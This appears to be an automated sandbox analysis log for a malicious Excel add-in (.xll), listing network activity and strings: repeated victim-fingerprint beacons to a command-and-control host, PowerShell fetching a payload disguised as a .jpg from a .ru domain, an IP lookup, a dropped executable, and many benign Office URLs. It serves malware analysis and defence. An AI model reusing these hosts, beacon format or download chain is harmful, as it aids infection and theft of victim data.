        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00611FC0 InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
        Source: global trafficHTTP traffic detected: GET /92375234.xml HTTP/1.1Connection: Keep-AliveHost: srand04rf.ru
        Source: global trafficHTTP traffic detected: GET /08.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: srand04rf.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
        Source: unknownDNS traffic detected: queries for: srand04rf.ru
        Source: unknownHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: snd32sys.exeString found in binary or memory: http://api.ipify.org
        Source: snd32sys.exe, 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmpString found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
        Source: 0708_5355150121.xllString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
        Source: powershell.exe, 00000002.00000003.226352766.0000000007D51000.00000004.00000001.sdmp, 0708_5355150121.xllString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: 0708_5355150121.xllString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
        Source: 0708_5355150121.xllString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
        Source: 0708_5355150121.xllString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
        Source: 0708_5355150121.xllString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
        Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: 0708_5355150121.xllString found in binary or memory: http://ocsp.comodoca.com0
        Source: 0708_5355150121.xllString found in binary or memory: http://ocsp.sectigo.com0
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png8
        Source: powershell.exe, 00000002.00000002.348512770.0000000004B41000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.331698788.00000000048E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000006.00000002.333951627.0000000004CEF000.00000004.00000001.sdmpString found in binary or memory: http://srand04rf.ru
        Source: powershell.exe, 00000006.00000002.333971406.0000000004CF7000.00000004.00000001.sdmpString found in binary or memory: http://srand04rf.ru/08
        Source: PowerShell_transcript.888683.93l2YHGR.20210708163033.txt.6.drString found in binary or memory: http://srand04rf.ru/08.jpg
        Source: powershell.exe, 00000006.00000002.332529239.0000000004AEB000.00000004.00000001.sdmpString found in binary or memory: http://srand04rf.ru4&jt
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html8
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.aadrm.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.cortana.ai
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.diagnostics.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.microsoftstream.com/api/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.office.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.onedrive.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://augloop.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://augloop.office.com/v2
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cdn.entity.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://config.edge.skype.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cortana.ai
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cortana.ai/api
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cr.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dev.cortana.ai
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://devnull.onenote.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://directory.services.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester8
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: powershell.exe, 00000006.00000003.320087365.000000000530E000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://graph.ppe.windows.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://graph.windows.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://graph.windows.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
